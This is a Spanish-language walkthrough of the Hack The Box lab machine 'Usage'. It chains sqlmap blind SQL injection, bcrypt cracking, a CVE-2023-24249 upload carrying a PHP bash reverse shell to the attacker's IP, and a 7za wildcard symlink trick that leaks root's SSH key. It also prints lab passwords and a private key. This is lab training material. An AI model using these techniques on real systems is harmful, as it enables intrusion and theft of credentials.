Usage
OS: Linux
Dificultad: Fácil
Puntos: 20
Nmap
ports=$(nmap -p- --min-rate=5000 -T4 10.129.147.83 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.129.147.83
Nmap scan report for 10.129.147.83
Host is up, received reset ttl 63 (0.14s latency).
Scanned at 2024-04-15 16:44:25 EDT for 11s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFfdLKVCM7tItpTAWFFy6gTlaOXOkNbeGIN9+NQMn89HkDBG3W3XDQDyM5JAYDlvDpngF58j/WrZkZw0rS6YqS0=
| 256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHr8ATPpxGtqlj8B7z2Lh7GrZVTSsLb6MkU3laICZlTk
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeracion
Enumerando la pagina hay funciones de registro, login y un panel de administrador que tiene otro subdominio.
echo "10.129.147.83 usage.htb admin.usage.htb" >> /etc/hosts
Despues de varias pruebas de enumeracion a la aplicacion web nos percatamos que la funcion de reset password es vulnerable a sql injection.
SQL Injection
Copias la request para utilizarla con sqlmap.
POST /forget-password HTTP/1.1
Host: usage.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 188
Origin: http://usage.htb
Connection: close
Referer: http://usage.htb/forget-password
Cookie: XSRF-TOKEN=eyJpdiI6InZqaTVuWXltT1hPWVg2cmVhYUUyTVE9PSIsInZhbHVlIjoicWtkVzRRR0I5WDk5VlpROVJvd2wxWExoVEg5ZmR6RmZlSGI0QldPdTU1Tm5taFF1OEpCbVBHU3lvMSt5SHBpeEpBdEh4ZitTV3BjTEtnWUtVTElYS1cvcUpZN2xkUEFERzFnS0drVU5LYmh1Y2NjcEN6SVkzUEdkcEVHNG1FcUoiLCJtYWMiOiIzMGE1YTE1YzU2OGE3NGRlODNlYzRjOTk3ODE5ZGI4MDY4ZTkxZGQyMDE4YzllNzVhMmIyODQwOGQ3ZDM5NWFmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Imp0eEhLRmZPSTcyaVZleUh3TjhyYUE9PSIsInZhbHVlIjoiT3ZLdzI4ZXRud3M4NDYwR0luQU5IUVNkb1N5WjZBazZ6R2pqQXFwYm1IMTFmYzhoY2tCV3ZlSXE0UlhuNVZsS1Z2aGFqRGFXTUxBY1RwUXJsMWtVZGdOUk1KWWJhUGc5L2hZNVhWVEdISEVuT0U3RjZpVWNLYnBLdlBnR1E5SmoiLCJtYWMiOiI2ZTZhZWVlODY4MzliNDA4MTBiMjEyMWYyOWViMWU3OTMyYWRiMjg5MTIzZjUyYjE0MjNhZGM1NGMzMjBkNWM5IiwidGFnIjoiIn0%3D
Upgrade-Insecure-Requests: 1
_token=AlaJuekLpjcxMmkB8sAerfxAQc2HkP3D2XvC5m6e&email=test
Usando sql map detectamos la injection.
sqlmap -r req.txt -p email --level 3
[17:54:54] [INFO] checking if the injection point on POST parameter 'email' is a false positive
sqlmap identified the following injection point(s) with a total of 390 HTTP(s) requests:
---
Parameter: email (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: _token=AlaJuekLpjcxMmkB8sAerfxAQc2HkP3D2XvC5m6e&email=test' AND 9240=(SELECT (CASE WHEN (9240=9240) THEN 9240 ELSE (SELECT 8606 UNION SELECT 9576) END))-- LfWm
---
[17:55:14] [INFO] testing MySQL
[17:55:15] [INFO] confirming MySQL
[17:55:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 8.0.0
[17:55:20] [WARNING] HTTP error codes detected during run:
Con los siguientes comandos obtenemos mas informacion.
sqlmap -r req.txt -p email --current-db
sqlmap -r req.txt -p email -D usage_blog --tables
Database: usage_blog
[8 tables]
+------------------------+
| admin_menu |
| admin_operation_log |
| admin_permissions |
| admin_role_menu |
| admin_role_permissions |
| admin_role_users |
| admin_roles |
| admin_user_permissi |
+------------------------+
A pesar de que tenemos sql injection este proceso es muy lento ya que es boolean por lo tanto buscamos informacion sobre las tablas y columnas en este github.
Podemos suponer por la estructura de las tablas que hay una que se llama admin_users.
sqlmap -r req.txt -p email -D usage_blog -T admin_users -C username,password --dump
Database: usage_blog
Table: admin_users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 |
+----------+--------------------------------------------------------------+
Crack hash
Ahora utilizamos john para crackear el password.
┌──(root㉿kali)-[~/htb/Box/Usage]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
whatever1 (?)
1g 0:00:00:27 DONE (2024-05-09 19:04) 0.03607g/s 58.44p/s 58.44c/s 58.44C/s alexis1..serena
Use the "--show" option to display all of the cracked passwords reliably
Laravel Admin Arbitrary Code Execution (CVE-2023-24249)
Accedemos a la pagina de admin y vemos lad dependencias utilizadas y sus versiones.
Investigando si tiene alguna vulnerabilidad esas versiones llegamos al siguiente blog.
https://flyd.uk/post/cve-2023-24249/
Siguiendo los pasos del blog podemos obtener RCE, primero capturamos la request al momento de subir la imagen y la modificamos.
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.14.221/1234 0>&1'");?>
Una vez que se ha cargado, copiamos el link de descarga y eso ejectura nuestro comando.
Nos regresara la reverse shell.
Privilege Escalation
Copiaremos la llave ssh para conectarnos y nos sea mas comodo.
cat /home/dash/.ssh/id_rsa
┌──(root㉿kali)-[~/htb/Box/Usage]
└─# nano dash_rsa
┌──(root㉿kali)-[~/htb/Box/Usage]
└─# chmod 400 dash_rsa
┌──(root㉿kali)-[~/htb/Box/Usage]
└─# ssh -i dash_rsa dash@10.10.11.18
The authenticity of host '10.10.11.18 (10.10.11.18)' can't be established.
Warning: Permanently added '10.10.11.18' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)
Last login: Mon Apr 8 12:35:43 2024 from 10.10.14.40
dash@usage:~$ cat user.txt
d32b4c6469f881e2a4f52ad536333604
En el home del usario se encuentra un archivo interesante .monitrc. Este archivo contiene un password.
dash@usage:~$ cat .monitrc
#Monitoring Interval in Seconds
set daemon 60
#Enable Web Access
set httpd port 2812
use address 127.0.0.1
allow admin:3nc0d3d_pa$$w0rd
Este password puede ser utilizado con el usuario xander.
xander : 3nc0d3d_pa$$w0rd
dash@usage:~$ su xander
Password:
xander@usage:/home/dash$ cd
xander@usage:~$ id
uid=1001(xander) gid=1001(xander) groups=1001(xander)
El usuario puede usar el siguiente comando como sudo.
xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User xander may run the following commands on usage:
(ALL : ALL) NOPASSWD: /usr/bin/usage_management
Utilizando strings podemos ver un poco de lo que hace el binario.
xander@usage:~$ strings /usr/bin/usage_management
/lib64/ld-linux-x86-64.so.2
...
...
/var/www/html
/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
Error changing working directory to /var/www/html
/usr/bin/mysqldump -A > /var/backups/mysql_backup.sql
Password has been reset.
Choose an option:
1. Project Backup
Esta linea es muy importante ya que esta creando el archivo project.zip de todos los archivos del directorio actual.
/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
Vemos que aqui se aplica el mismo concepto.
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks#id-7z
Por lo tanto podemos aprovecharnos de esto creando un symlink de algun archivo root y luego ejecutar el comando.
xander@usage:/var/www/html$ touch @id_rsa
xander@usage:/var/www/html$ ln -s /root/.ssh/id_rsa id_rsa
Ahora ejecutamos el comando y seleccionamos la opcion 1 para ver el output del archivo link.
xander@usage:/var/www/html$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Xeon(R) Gold 5218 CPU @ 2.30GHz (50657),ASM,AES-NI)
Open archive: /var/backups/project.zip
--
Path = /var/backups/project.zip
Type = zip
Physical Size = 54865351
Scanning the drive:
Archive size: 54865924 bytes (53 MiB)
Scan WARNINGS for files and folders:
-----BEGIN OPENSSH PRIVATE KEY----- : No more files
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW : No more files
QyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3QAAAJAfwyJCH8Mi : No more files
QgAAAAtzc2gtZWQyNTUxOQAAACC20mOr6LAHUMxon+edz07Q7B9rH01mXhQyxpqjIa6g3Q : No more files
AAAEC63P+5DvKwuQtE4YOD4IEeqfSPszxqIL1Wx1IT31xsmrbSY6vosAdQzGif553PTtDs : No more files
H2sfTWZeFDLGmqMhrqDdAAAACnJvb3RAdXNhZ2UBAgM= : No more files
-----END OPENSSH PRIVATE KEY----- : No more files
----------------
Scan WARNINGS: 7
Nos conectamos por SSH.
ssh -i root_rsa root@10.10.11.18
Referencias
https://github.com/z-song/laravel-admin/blob/master/database/migrations/2016_01_04_173148_create_admin_tables.php
https://flyd.uk/post/cve-2023-24249/
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks#id-7z